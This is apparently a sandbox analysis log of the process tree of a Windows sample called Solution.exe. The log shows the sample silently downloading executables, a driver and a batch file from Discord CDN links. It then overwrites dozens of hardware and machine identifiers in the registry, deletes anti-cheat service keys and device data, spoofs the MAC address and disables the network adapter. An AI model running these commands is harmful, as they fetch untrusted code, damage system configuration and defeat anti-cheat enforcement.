  2⤵
  PID:3748
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1132
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1740
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:488
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:2376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3416
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1780
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3160
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOwner /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:2272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3916
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v registeredOrganization /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:2660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2312
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 286243281-2950429714-2046229010 /f
    3⤵
    PID:4488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:2736
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {286243281-2950429714-2046229010} /f
    3⤵
    - Modifies registry key
    PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3540
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {286243281-2950429714-2046229010} /f
    3⤵
    - Modifies registry key
    PID:3020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\MountedDevices /f >nul
  2⤵
  PID:2428
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    - Modifies registry key
    PID:2972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f >nul
  2⤵
  PID:3736
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    - Modifies registry key
    PID:4548
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f >nul
  2⤵
  PID:3236
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    - Modifies registry key
    PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f >nul
  2⤵
  PID:4608
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    - Modifies registry key
    PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f >nul
  2⤵
  PID:4516
- - C:\Windows\system32\reg.exe
    reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    - Modifies registry key
    PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f >nul
  2⤵
  PID:3448
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:5088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f >nul
  2⤵
  PID:5100
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
    3⤵
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f >nul
  2⤵
  PID:1540
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
    3⤵
    - Modifies registry key
    PID:2416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f >nul
  2⤵
  PID:4000
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
    3⤵
    PID:4900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f >nul
  2⤵
  PID:2852
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f >nul
  2⤵
  PID:3436
- - C:\Windows\system32\reg.exe
    reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    - Checks processor information in registry
    PID:2292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f >nul
  2⤵
  PID:3284
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
    3⤵
    - Modifies registry key
    PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f >nul
  2⤵
  PID:448
- - C:\Windows\system32\reg.exe
    reg delete HKLM\SYSTEM\ControlSet001\Services\BEService /f
    3⤵
    - Modifies registry key
    PID:4536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:4632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:1216
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3892
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:1956
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:4688
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:4644
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:4840
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v NetworkAddress /t REG_SZ /d E62C23451539 /f
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic nic where physicaladapter=true get deviceid | findstr [0-9]
    3⤵
    PID:4192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where physicaladapter=true get deviceid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4064
  - - C:\Windows\system32\findstr.exe
      findstr [0-9]
      4⤵
      PID:4948
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\01
    3⤵
    PID:3996
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\001
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001
    3⤵
    PID:700
- - C:\Windows\system32\reg.exe
    REG ADD HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002bE10318}\0001 /v PnPCapabilities /t REG_DWORD /d 24 /f
    3⤵
    PID:440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv"
    3⤵
    PID:4984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic nic where (netconnectionid like '%') get netconnectionid,netconnectionstatus /format:csv
      4⤵
      PID:4932
- - C:\Windows\system32\netsh.exe
    netsh interface set interface name="Ethernet" disable
    3⤵
    PID:3524

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
1⤵
- Modifies data under HKEY_USERS
PID:1676

C:\Users\Admin\AppData\Local\Temp\Solution.exe
"C:\Users\Admin\AppData\Local\Temp\Solution.exe"
1⤵
PID:840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c color f
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause >nul
  2⤵
  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
  2⤵
  PID:3900
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556901333475459/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
    3⤵
    - Drops file in Windows directory
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
  2⤵
  PID:4016
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556912746188840/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
    3⤵
    - Drops file in Windows directory
    PID:3292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
  2⤵
  PID:1296
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556924335034541/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
    3⤵
    - Drops file in Windows directory
    PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
  2⤵
  PID:632
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556933348597870/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
    3⤵
    - Drops file in Windows directory
    PID:1820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
  2⤵
  PID:4924
- - C:\Windows\system32\curl.exe
    curl --silent https://cdn.discordapp.com/attachments/1176556739953447003/1176556940990627880/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
    3⤵
    - Drops file in Windows directory
    PID:1092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:4960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 28618 /f
    3⤵
    PID:2956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %random% /f >nul
  2⤵
  PID:2976
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 28618 /f
    3⤵
    - Modifies registry key
    PID:3696
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:2208
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    - Modifies registry key
    PID:260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2861814552-2654314356-3260021156 /f
    3⤵
    PID:3236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1264
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    - Modifies registry key
    PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:1324
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2861814552-2654314356-3260021156} /f
    3⤵
    PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:5088
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    PID:3448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4572
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    PID:5100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2416
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2861814552-2654314356-3260021156 /f
    3⤵
    PID:1540
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4900
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:4000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4656
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:2852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2292
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:3436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4036
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4536
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2324
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:4632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1956
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Modifies registry key
    PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4888
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:3332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4444
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Enumerates system info in registry
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1592
- - C:\Windows\system32\reg.exe
    reg add HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    - Enumerates system info in registry
    - Modifies registry key
    PID:3288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%%random%-%random%%random%-%random%%random%} /f >nul
  2⤵
  PID:3964
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {2862125300-116395651-1014725083} /f
    3⤵
    - Modifies registry key
    PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:1804
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:2396
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2652
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:2056
- - C:\Windows\system32\reg.exe
    reg add HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:4432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3864
- - C:\Windows\system32\reg.exe
    reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 2862125300-116395651-1014725083 /f
    3⤵
    PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4896
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:4936
- - C:\Windows\system32\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 286243281-2950429714-2046229010 /f
    3⤵
    - Modifies registry key
    PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random%%random%-%random%%random%-%random%%random% /f >nul
  2⤵
  PID:3748
